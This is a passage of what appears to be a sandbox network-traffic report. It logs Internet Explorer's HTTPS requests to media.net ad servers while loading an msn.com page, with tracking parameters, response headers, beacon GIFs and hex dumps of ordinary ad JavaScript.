c_cbdp=0&sc_bId=&sc_cat=&sc_cmpid=&sc_advId=&sc_advNm=&sc_advUrl=&udc=&rti=-1&rme=ADPTR&bbdrid=&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&kwrf=&epurl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp HTTP/1.1
                                                                                                                                                                                                                  Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                                                                  Referer: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                  Host: hblg.media.net
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  2021-12-02 23:42:59 UTC866INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                  Content-Length: 35
                                                                                                                                                                                                                  Server: Jetty(9.4.35.v20201120)
                                                                                                                                                                                                                  Expires: Thu, 02 Dec 2021 23:42:59 GMT
                                                                                                                                                                                                                  Cache-Control: max-age=0, no-cache, no-store
                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                  Date: Thu, 02 Dec 2021 23:42:59 GMT
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  2021-12-02 23:42:59 UTC866INData Raw: 47 49 46 38 39 61 01 00 01 00 f0 00 00 00 00 00 ff ff ff 2c 00 00 00 00 01 00 01 00 40 02 02 4c 01 00 3b
                                                                                                                                                                                                                  Data Ascii: GIF89a,@L;


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                  11192.168.2.64980323.211.6.95443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                  2021-12-02 23:43:06 UTC866OUTGET /log?logid=awlog&pid=8PR68Q253&itype=HB-CM&dn=msn.com&cid=8HBI57XIG&svr=2021111013_170&servname=hbcm_na&gdpr=0&csex=0&suc=0&csstr=&tcf_cmp=&tcf_status=&tcf_prp=&usp_status=0&usp_enf=1&usp_string=&ufca=&usp_ldf=&ugd=4&adt=desktop&vid=00001638520995419014104136339406&vsid=&sd=2&gtd=400&inid=0&gfd=&cc=CH&sc=ZH&ct=ZURICH&abte=CONTROL&adbd=0&amp=0&version=1&sB=false&cors=true&disB=false&ice=&vw=284&vh=271&pht=271&cl=&__rk=0&app=0&rtype=&vendor=&isSafari=0&lbr=0&floc_id=&floc_ver=&id_details=&mnkv=&pabte=&pbcm=0&pvid=4&prvAccId=722878611&prvApiId=8CU157172&exid=31&pcId=&pseat=4-BID_API&mowxReqId=695089110086948631638520986847&crid=976531914&g=0&size=300x250&sec=&chnl=&prspt=headerBid&rfc=0&tref=0&fpuReq=1&plcmtt=0&rtime=48&dtc=nydc&rtbsv2=&mp_seg<>=44412%23%2315390%23%2315718%23%2317218%23%2328447%23%2333721%23%2354934%23%2353492%23%2360148&apid=1&wsip=c10-mowx-web-43&ltime=8567&abs=0&ae=0&ftr<>=&ssregion=&ssreqid=&sssvnm=&bdp=0.02&cbdp=0.02&dcbdp=0&ckfl=0&cs=&mnet_ckfl=0&cat=&attr=&pvAgNm=&pvAgId=&advId=&advNm=&advUrl=unknown&dfpBd=0.02&nms=1&di=&dt=O&epc=722878611&ogbdp=0.02&s=1&snm=success&dbf=1&bdata=sd2%3Dnull~bb%3D186~vv%3D0~erpm%3D0.04~ogerpm%3D0.04~MFB%3D10K~smm_bid%3D0.02~bm%3D0.9~smm_sd%3D2021120121~sid%3D722878611~sd%3D2~uid%3D2IaaKnuVnvziDdNYpZ~dc2%3D1~btd%3D14241703849787268410763125577306022343800731350682634986482226645438464~scd%3Dzh~uim%3D466966~url_tkc%3D0~ss%3D1280x1024~uiw%3D100~ce%3D1~xgb_sd%3D2021101600~last%3D0~CI%3D2624~ip%3D1xrX0Z~fbb%3D0~riipua%3D0%2C0~xgb_nt%3D101~nts%3D1~tb%3D-1~et%3D28~ct%3Dzurich~rc%3D8%2C1~basis2%3D196~url_b%3D0.04~basis1%3D196~isRef%3D0~lc%3D0~url_tvi%3D0~smm_wr%3D2.0898~url_l%3D50~xgboost_b%3D0.92~bid%3D0.02~xgb_b%3D0.92~dc%3D8~gcat%3D500884~ogbid%3D0.02%7C%7Ccbdp%3D0.02%7C%7Cbflag%3D0%7C%7Csobp%3D0%7C%7Cddiv%3D%25%25DFP_DIV%25%25%7C%7Cdmm%3D%25%25DMS_STRATEGY%25%25%7C%7Cdtc%3Dnydc%7C%7Cabte%3DCONTROL%7C%7Chsw%3D%25%25HAS_SECOND_WINNER%25%25~ibc%3D1~ddt%3D-1~nsz%3D1~tgs%3D300x250~bsb%3D0~bsp%3D0~tmx%3D200&cmpid=&bId=&pcrid=8CU157172-722878611-48-8&ruct=0&brs=&brr=&iurl=https%3A%2F%2Fiurl-a.akamaihd.net%2Fybntag%3F%26cid%3D8CU157172%26crid%3D722878611%26size%3D300x250%26requrl%3Dhttps%253A%252F%252Fwww.msn.com%252Fde-ch%252F%253Focid%253Diehp&htps=0&ptype=27&pbidflr=0.00&exp=sfl%3Dfalse%7CssBucket%3D0%7Cbfl%3D-100%7Cclt%3D0%7Cfl_rl%3D1%7CssProfile%3D0%7Cdbr%3D1%7Ctkd%3Dnull&bfs=0&seat=BID_API&nbr=0&ba=0&ybnca_gbid=&ybnca_erpm=0.04&ybnca_vbid=&yogbdp=0.02&yErpmFlag=0&smsrc=1&strg=&ybnca_bbid=&prvReqId=5651415265142258_1006712733_976531914141&dStat=0&ogbid=0.02&acid=154704099775382721638520986219&act=headerBid&dtfdl=&dspltime=&ttfd=&ttm=0&vtm=0&sttm=0&svtm=0&mnrfc=0&mnrf=0&invw=-1&adj1=0&adj0=0&adj2=0&adj3=0&patkey=&patint<>=&pc=&spSource=0&spIvt=3&spId=&spFst=0&spIsReq=3&spTo=3&top=0&btm=0&lft=0&rght=0&mx_SD=&mx_PC=1&mx_SPRIG=1&mx_UCC=2&mx_lr_seg_cnt=0&mx_GCID=0&mx_IAB2=1&mx_ip_exp_verd=&mx_vsGap=&mx_epbc=8CU157172&mx_bsBucket=0&mx_ssProfile=0&mx_lr=0&mx_g_one_uid_sent=None&mx_uid_sent=0&mx_yhs_enabled=&mx_SC=0&mx_lr_seg_deal=0&mx_yhs_target_bidders=&mx_g_uid_cvrg=&mx_mrpp_key=&mx_divid=&mx_dfpadpath=&mx_g_uid_sent<>=&mx_BCN_BF=&mx_BCE=&mx_BCI=&mx_BCT=&mx_BCN_YHS=&mx_BCW=&mx_bsProfile=0&mx_ssBucket=0&mx_TAF=0&mx_supply_path=&mx_sbp=-10&mx_yhs_selected_deal=&mx_tgs=300x250&mx_TAS=&mx_asset_id=&mx_adnm=&mx_aurl_hc=0&mx_yhs_deal_sent=&mx_aqcpl_crid=0&mx_aabpc=0&mx_adid=&mx_nsz=1&mx_isLossNtf=false&mx_aurt=0&mx_gpid_sent=false&pgcatiab=IAB12&pgcatiab2=379&pgcatsprig=16&gFunDl=false&ngFunDl=false&rDl=false&actltime=9200&auMxTm=&brf=0&dcs=&dfpDiv=&dfpPos=&dfpAdPath=&lper=1&td=r%3Dstr%7Cab%3D0%7C&oyaf=0&sbdrid=328&ra_sz=300x250&tk=&sc_pvid=&sc_ogbdp=0&sc_adj1=0&sc_adj0=0&sc_adj2=0&sc_prspt=&sc_act=&sc_bdata=&sc_bdp=0&sc_cbdp=0&sc_bId=&sc_cat=&sc_cmpid=&sc_advId=&sc_advNm=&sc_advUrl=&udc=&rti=-1&rme=ADPTR&bbdrid=&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&kwrf=&epurl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp HTTP/1.1
                                                                                                                                                                                                                  Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                                                                  Referer: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                  Host: hblg.media.net
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  2021-12-02 23:43:06 UTC870INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                  Content-Length: 35
                                                                                                                                                                                                                  Server: Jetty(9.4.35.v20201120)
                                                                                                                                                                                                                  Expires: Thu, 02 Dec 2021 23:43:06 GMT
                                                                                                                                                                                                                  Cache-Control: max-age=0, no-cache, no-store
                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                  Date: Thu, 02 Dec 2021 23:43:06 GMT
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  2021-12-02 23:43:06 UTC870INData Raw: 47 49 46 38 39 61 01 00 01 00 f0 00 00 00 00 00 ff ff ff 2c 00 00 00 00 01 00 01 00 40 02 02 4c 01 00 3b
                                                                                                                                                                                                                  Data Ascii: GIF89a,@L;


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                  12192.168.2.64980623.211.6.95443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                  2021-12-02 23:43:07 UTC870OUTGET /803288796/fcmain.js?cb=window._mNDetails.initAd&&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3D%3D&crid=722878611&size=306x271&cc=CH&https=1&vif=2&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&nse=5&vi=1638488555296348136&ugd=4&rtbs=1&nb=1 HTTP/1.1
                                                                                                                                                                                                                  Accept: application/javascript, */*;q=0.8
                                                                                                                                                                                                                  Referer: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                  Host: contextual.media.net
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Cookie: hbcm_sd=4%7C1638520979780
                                                                                                                                                                                                                  2021-12-02 23:43:07 UTC871INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  Content-Length: 39142
                                                                                                                                                                                                                  Content-Type: text/javascript
                                                                                                                                                                                                                  X-MNT-HL2: 8-18
                                                                                                                                                                                                                  X-MNT-W: 10-7
                                                                                                                                                                                                                  Strict-Transport-Security: max-age=604800
                                                                                                                                                                                                                  Expires: Thu, 02 Dec 2021 23:43:07 GMT
                                                                                                                                                                                                                  Cache-Control: max-age=0, no-cache, no-store
                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                  Date: Thu, 02 Dec 2021 23:43:07 GMT
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  2021-12-02 23:43:07 UTC871INData Raw: 20 20 20 20
                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                  2021-12-02 23:43:07 UTC871INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3b 77 69 6e 64 6f 77 2e 5f 6d 4e 44 65 74 61 69 6c 73 2e 69 6e 69 74 41 64 28 7b 22 76 69 22 3a 22 31 36 33 38 34 38 38 35 35 35 32 39 36 33 34 38 31 33 36 22 2c 22 73 22 3a 7b 22 5f 6d 4e 4c 32 22 3a 7b 22 73 69 7a 65 22 3a 22 33 30 36 78 32 37 31 22 2c 22 76 69 43 6f 6d 70 22 3a 22 31 36 33 38 34 38 37 31 33 37 38 39 35 38 30 35 39 32 37 22 2c 22 68 69 64 65 41 64 55 6e 69 74 41 42 50 22 3a 74 72 75 65 2c 22 61 62 70 6c 22 3a 22 33 22 2c 22 63 75 73 74 48 74 22 3a 22 22 2c 22 73 65 74 4c 33 31 30 30 22 3a 22 31 22 7d 2c 22 6c 68 70 22 3a 7b 22 6c 32 77 73 69 70 22 3a 22 32 38 38 37 33 30 35 32 33 33 22 2c 22 6c 32 61 63 22 3a 22 22 2c 22 73 65 74 68 63 73 64 22 3a 22 73 65 74 21 41 31 38 7c 38 30 31 33 22 7d 2c
                                                                                                                                                                                                                  Data Ascii: ;window._mNDetails.initAd({"vi":"1638488555296348136","s":{"_mNL2":{"size":"306x271","viComp":"1638487137895805927","hideAdUnitABP":true,"abpl":"3","custHt":"","setL3100":"1"},"lhp":{"l2wsip":"2887305233","l2ac":"","sethcsd":"set!A18|8013"},
                                                                                                                                                                                                                  2021-12-02 23:43:07 UTC887INData Raw: 37 74 36 39 74 35 36 74 37 34 74 36 66 74 34 38 74 36 39 74 33 31 74 37 30 74 37 35 74 37 30 74 35 39 74 37 39 74 36 33 74 37 35 74 34 63 74 35 34 74 37 30 74 32 64 74 36 35 74 35 38 74 37 33 74 36 38 74 37 36 74 37 35 74 36 31 74 36 33 74 32 64 74 36 66 74 35 38 74 33 39 74 36 62 74 36 37 74 36 37 74 32 35 74 33 33 74 34 34 74 32 35 74 33 33 74 34 34 74 32 35 74 33 37 74 34 33 74 34 65 74 33 37 74 36 36 74 37 35 74 33 32 74 37 36 74 34 62 74 37 34 74 33 38 74 35 66 74 37 33 74 32 35 74 33 33 74 34 34 74 32 35 74 33 37 74 34 33 74 36 36 74 33 35 74 36 32 74 36 36 74 33 31 74 37 35 74 33 37 74 36 36 74 34 63 74 36 61 74 36 65 74 36 64 74 33 33 74 33 37 74 36 63 74 36 31 74 33 34 74 34 66 74 37 31 74 34 35 74 33 34 74 33 37 74 35 32 74 37 34 74 34 33 74 36
                                                                                                                                                                                                                  Data Ascii: 7t69t56t74t6ft48t69t31t70t75t70t59t79t63t75t4ct54t70t2dt65t58t73t68t76t75t61t63t2dt6ft58t39t6bt67t67t25t33t44t25t33t44t25t37t43t4et37t66t75t32t76t4bt74t38t5ft73t25t33t44t25t37t43t66t35t62t66t31t75t37t66t4ct6at6et6dt33t37t6ct61t34t4ft71t45t34t37t52t74t43t6
                                                                                                                                                                                                                  2021-12-02 23:43:07 UTC895INData Raw: 36 62 74 36 63 74 36 35 74 36 39 74 36 34 74 36 35 74 37 32 7a 74 36 39 74 36 65 7a 74 36 37 74 37 32 74 36 66 74 35 63 74 37 35 74 33 30 74 33 30 74 36 34 74 36 36 74 36 35 74 36 65 7a 74 34 37 74 37 32 74 35 63 74 37 35 74 33 30 74 33 30 74 36 36 74 33 36 74 35 63 74 37 35 74 33 30 74 33 30 74 36 34 74 36 36 74 36 35 74 36 65 77 78 77 74 36 62 74 36 33 77 79 77 74 32 64 74 32 64 74 36 65 74 35 63 74 32 66 74 36 31 74 32 64 74 32 64 77 78 77 74 36 62 74 36 33 74 36 39 74 36 34 77 79 74 32 64 74 33 31 74 37 64 74 35 64 74 37 64 78 74 37 62 77 74 36 33 77 79 74 33 31 78 77 74 36 62 77 79 74 35 62 74 37 62 77 74 36 39 77 79 74 33 33 74 33 32 74 33 39 74 33 34 74 33 39 74 33 36 74 33 35 74 33 31 74 33 31 78 77 74 37 34 77 79 77 74 34 34 74 36 39 74 36 35 7a
                                                                                                                                                                                                                  Data Ascii: 6bt6ct65t69t64t65t72zt69t6ezt67t72t6ft5ct75t30t30t64t66t65t6ezt47t72t5ct75t30t30t66t36t5ct75t30t30t64t66t65t6ewxwt6bt63wywt2dt2dt6et5ct2ft61t2dt2dwxwt6bt63t69t64wyt2dt31t7dt5dt7dxt7bwt63wyt31xwt6bwyt5bt7bwt69wyt33t32t39t34t39t36t35t31t31xwt74wywt44t69t65z


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                  13192.168.2.64980823.211.6.95443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                  2021-12-02 23:43:07 UTC910OUTGET /bqi.php?lf=5&&vgd_l2type=setting&pid=8PO8WH2OT&cme=wKMzE5aEf1C7W8c2Zu-wR6W8-LV6OuNn5M8-l7xIv5OFVIrj5gO7h1h0qwkXsk1YkKHiWm6OwnS8YdF7hxOqVy4gI-Di5bXqA_L7Nj1Gg-bLo1QZupPE9_lkGVq8LafeqNrLclh8bDzLkZpLway17PoLJDHoGdSHRiqjLFunN_rSbZHJFAjGFIv7F87z8XmJ-E7BhMXbxjXouwQLvaGa-ShCB3oRwwh8||NDHRnZ9Gz3KXlI-i9OnZqQ==|5gDUJdTGiJzedmq9hanWYg==|sRBSg3CPSiQ=|YdjFvixrVaHKWoanJxQ7pN1u-FbdnHzrNjhpugAcObH3UBK3ulwAWl7Dk2fLSIhhcacW0wejpmUUSEEp7HvKRQ==|N7fu2vKt8_s=|2Vo1csK06ElQVm9wtd7kmyhUd8oCSycUmnOt-CKThRGW5B7OtbhnTLfgAjgMfKS9GxuAl0hmLh7h59eRacx_zlI1mhj_yGBtc0wpPjW7ZYHmZRI-Qs46jvsASGwtenQv5_6kd41JpbzUVoJx6JhY_2c-CqKREqoxgJ7iifrLoawE2O9aRy41se9ZHO7dRZ1TuzVy17bY00rUzIYODMSLh1Pcyr8slxcI|&gdpr=0&prid=8PRVV7640&cid=8CU157172&crid=858412214&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&vi=1638488555656014322&ugd=4&cc=CH&sc=ZH&bdrid=4&startTime=1638520979055&l2type=setting&vgd_l1rakh=1638488555181756319&l1ch=1&sttm=1638520979548&upk=1638520976.1854&hvsid=00001638520979548014104136331645&verid=9999999&vgd_sc=ZH&infr=1&twna=1&vgd_hbReqId=T1638483495C8S22U926&l1hcsd=l1!N4|8028&vgd_l1rhst=contextual.media.net&vgd_gdprcs=1&vgd_uspa=0&vgd_isiolc=0&clp=%7B%7D&cl=%7B%7D&rtbsd=10&bidData=sd2%3Dnull~bb%3D186~vv%3D0~erpm%3D0.03~ogerpm%3D0.03~MFB%3D2jo~smm_bid%3D0.02~bm%3D1~smm_sd%3D2021120121~sid%3D858412214~sd%3D1~uid%3D2IaaJtXbXqos4SCzmA~dc2%3D1~btd%3D14241703836931763290446355943300556902506328540099388593272215750316032~scd%3Dzh~uim%3D464908~url_tkc%3D0~ss%3D1280x1024~uiw%3D100~ce%3D1~xgb_sd%3D2021101600~last%3D0~CI%3D2624~ip%3D1xrX0Z~fbb%3D0~riipua%3D0%2C0~xgb_nt%3D101~nts%3D1~tb%3D-1~et%3D27~ct%3Dzurich~rc%3D6%2C0~basis2%3D196~url_b%3D0.03~basis1%3D196~isRef%3D0~lc%3D0~url_tvi%3D0~smm_wr%3D2.2127~url_l%3D50~xgboost_b%3D0.92~bid%3D0.02~xgb_b%3D0.92~dc%3D8~gcat%3D500884~ogbid%3D0.02%7C%7Ccbdp%3D0.02%7C%7Cbflag%3D0%7C%7Csobp%3D0%7C%7Cddiv%3D%25%25DFP_DIV%25%25%7C%7Cdmm%3D%25%25DMS_STRATEGY%25%25%7C%7Cdtc%3Dnydc%7C%7Cabte%3DCONTROL%7C%7Chsw%3D%25%25HAS_SECOND_WINNER%25%25~ibc%3D1~ddt%3D-1~nsz%3D1~tgs%3D300x250~bsb%3D0~bsp%3D0~tmx%3D200&matchString=hr%3D0&l2ch=1&l2wsip=170721631&sethcsd=set!A18%7C8013&vgd_pgid=p11306311666t202112030842&vgd_pgids=1 HTTP/1.1
                                                                                                                                                                                                                  Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                                                                  Referer: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                  Host: lg3.media.net
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  2021-12-02 23:43:07 UTC912INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  Content-Length: 15
                                                                                                                                                                                                                  Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                                                                                  ntCoent-Length: 15
                                                                                                                                                                                                                  Strict-Transport-Security: max-age=21600
                                                                                                                                                                                                                  Expires: Thu, 02 Dec 2021 23:43:07 GMT
                                                                                                                                                                                                                  Cache-Control: max-age=0, no-cache, no-store
                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                  Date: Thu, 02 Dec 2021 23:43:07 GMT
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  2021-12-02 23:43:07 UTC913INData Raw: 76 61 72 20 6c 6f 67 67 65 64 20 3d 20 31 3b
                                                                                                                                                                                                                  Data Ascii: var logged = 1;


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                  14192.168.2.64980923.211.6.95443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                  2021-12-02 23:43:07 UTC912OUTGET /48/nrrV52461.js HTTP/1.1
                                                                                                                                                                                                                  Accept: application/javascript, */*;q=0.8
                                                                                                                                                                                                                  Referer: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                  Host: contextual.media.net
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Cookie: hbcm_sd=4%7C1638520979780
                                                                                                                                                                                                                  2021-12-02 23:43:07 UTC913INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  Content-Length: 91348
                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                  Pragma: max-age=2592000
                                                                                                                                                                                                                  ETag: "f3dcc1592ff35c4ac7631edb38265c3f"
                                                                                                                                                                                                                  Strict-Transport-Security: max-age=604800
                                                                                                                                                                                                                  X-MNET-H: 8-12
                                                                                                                                                                                                                  Cache-Control: max-age=1209600
                                                                                                                                                                                                                  Expires: Thu, 16 Dec 2021 23:43:07 GMT
                                                                                                                                                                                                                  Date: Thu, 02 Dec 2021 23:43:07 GMT
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  2021-12-02 23:43:07 UTC913INData Raw: 76 61 72 20 5f 6d 4e 52 65 71 75 69 72 65 2c 5f 6d 4e 44 65 66 69 6e 65 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 63 3d 7b 7d 2c 75 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 7d 5f 6d 4e 52 65 71 75 69 72 65 3d 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 72 29 7b 76 61 72 20 6e 2c 69 2c 6f 3d 5b 5d 3b 66 6f 72 28 69 20 69 6e 20 74 29 74 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 69 29 26 26 28 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 28 6e 3d 74 5b 69 5d 29 26 26 76 6f 69 64 20 30 21 3d 3d 6e 3f 28 76 6f 69 64 20 30 21 3d 3d 63 5b 6e 5d 7c 7c 28 63 5b 6e 5d 3d 65 28 75 5b 6e 5d 2e 64 65 70 73 2c 75 5b 6e 5d 2e 63
                                                                                                                                                                                                                  Data Ascii: var _mNRequire,_mNDefine;!function(){"use strict";var c={},u={};function a(e){return"function"==typeof e}_mNRequire=function e(t,r){var n,i,o=[];for(i in t)t.hasOwnProperty(i)&&("object"!=typeof(n=t[i])&&void 0!==n?(void 0!==c[n]||(c[n]=e(u[n].deps,u[n].c
                                                                                                                                                                                                                  2021-12-02 23:43:07 UTC916INData Raw: 3a 74 5b 6e 5d 29 29 29 3b 72 65 74 75 72 6e 20 6f 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 74 2c 65 29 7b 73 28 74 29 26 26 28 65 3d 75 28 65 29 3f 65 3a 22 22 2c 72 5b 74 5d 3d 65 29 7d 66 75 6e 63 74 69 6f 6e 20 69 28 74 29 7b 72 65 74 75 72 6e 22 5b 6f 62 6a 65 63 74 20 41 72 72 61 79 5d 22 3d 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 74 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 74 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 7d 66 75 6e 63 74 69 6f 6e 20 73 28 74 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 22 22 21 3d 3d 74 7d 66 75 6e 63 74 69 6f 6e 20 75 28 74 29 7b 73 77 69 74 63 68 28 74 79 70 65 6f 66 20 74 29 7b 63 61
                                                                                                                                                                                                                  Data Ascii: :t[n])));return o}function n(t,e){s(t)&&(e=u(e)?e:"",r[t]=e)}function i(t){return"[object Array]"===Object.prototype.toString.call(t)}function c(t){return"function"==typeof t}function s(t){return"string"==typeof t&&""!==t}function u(t){switch(typeof t){ca
                                                                                                                                                                                                                  2021-12-02 23:43:07 UTC932INData Raw: 26 26 6f 2e 69 73 53 65 74 28 65 2e 68 6f 73 74 6e 61 6d 65 29 3f 65 2e 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 22 2b 65 2e 68 6f 73 74 6e 61 6d 65 3a 6f 2e 69 73 53 65 74 28 65 2e 68 72 65 66 29 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 69 66 28 2d 31 3c 65 2e 69 6e 64 65 78 4f 66 28 22 2f 2f 22 29 29 72 65 74 75 72 6e 20 65 3d 28 74 3d 65 2e 73 70 6c 69 74 28 22 2f 22 29 29 5b 30 5d 2b 22 2f 2f 22 2b 74 5b 32 5d 7d 28 65 2e 68 72 65 66 29 3a 76 6f 69 64 20 30 7d 2c 73 65 74 54 61 72 67 65 74 4f 66 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 61 72 67 65 74 22 2c 74 29 7d 2c 67 65 74 54 61 72 67 65 74 4f 66 45 6c 65 6d 65 6e 74 46 6f 72 4c 6f 67 67 69 6e 67 3a 66 75 6e 63
                                                                                                                                                                                                                  Data Ascii: &&o.isSet(e.hostname)?e.protocol+"//"+e.hostname:o.isSet(e.href)?function(e){var t;if(-1<e.indexOf("//"))return e=(t=e.split("/"))[0]+"//"+t[2]}(e.href):void 0},setTargetOfElement:function(e,t){e.setAttribute("target",t)},getTargetOfElementForLogging:func
                                                                                                                                                                                                                  2021-12-02 23:43:07 UTC940INData Raw: 75 6e 63 74 69 6f 6e 20 67 28 74 2c 65 2c 69 29 7b 69 66 28 21 74 2e 69 70 61 74 68 29 72 65 74 75 72 6e 2d 31 3d 3d 65 2e 73 72 63 2e 69 6e 64 65 78 4f 66 28 22 34 30 34 5f 31 58 31 22 29 26 26 28 69 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 76 69 73 69 62 6c 65 22 29 2c 7a 65 28 22 6e 6c 22 2c 74 29 2c 63 28 65 29 2c 30 3b 76 61 72 20 72 2c 61 2c 6e 2c 6f 3d 6e 65 77 20 49 6d 61 67 65 2c 64 3d 28 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 72 79 7b 72 65 74 75 72 6e 7b 77 69 64 74 68 3a 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 77 69 64 74 68 22 29 7c 7c 65 2e 77 69 64 74 68 7c 7c 70 61 72 73 65 49 6e 74 28 74 2e 6d 61 74 63 68 28 2f 77 69 64 74 68 3d 28 5b 22 27 30 2d 39 5d 2b 29 2f 29 5b 31 5d 2e 72 65 70 6c 61 63 65 28 2f
                                                                                                                                                                                                                  Data Ascii: unction g(t,e,i){if(!t.ipath)return-1==e.src.indexOf("404_1X1")&&(i.style.visibility="visible"),ze("nl",t),c(e),0;var r,a,n,o=new Image,d=(d=function(e,t){try{return{width:e.getAttribute("width")||e.width||parseInt(t.match(/width=(["'0-9]+)/)[1].replace(/
